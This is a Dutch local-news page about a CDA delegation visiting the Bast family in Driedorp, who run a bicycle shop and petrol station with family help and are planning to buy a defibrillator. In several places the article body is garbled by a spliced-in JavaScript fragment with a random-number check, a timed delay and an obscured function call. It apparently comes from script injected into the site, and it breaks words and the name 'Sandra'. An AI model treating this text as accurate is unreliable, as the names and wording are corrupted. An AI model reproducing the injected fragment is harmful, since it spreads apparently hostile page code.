Bast Driedorp combinatie van saamhorigheid en ondernemen

Bast Driedorp combinatie van saamhorigheid en ondernemen

De CDA fractie heeft onlangs een bezoek gebracht aan de familie Bast in Driedorp en concludeerde, dat sommigen heel goed in staat zijn ondernemen en saamhorigheid te combineren.

Vijf jaar geleden kocht Gert Bast de rijwielhandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andel en benzinepomp samen met zijn echtgenote Sandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andra. Er is altijd hulp vanuit de familiekring. Veel familieleden van het echtpaar zijn regelmatig op de werkvloer te vinden. Zij springen bij in het bijhouden van de boekhouding, de bediening van de pomp, de oppas voor zoon Alex en niet te vergeten het repareren van fietsen.

Naast het ondernemen, zorgt het gezin met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen voor een leefbare en sociale omgeving. Onder het genot van een kopje koffie wordt dagelijks het wel en wee van de buurt besproken. Voor de fietsclub brengt Sandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andra “gelijkgestemden” bij elkaar en houdt zij zich bezig met levensstijlbegeleiding. De familie is in overleg om met nog twee andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere partijen om een AED aan te schaffen.

 

Bron: Nijkerk.Nieuws.nl

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *

Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.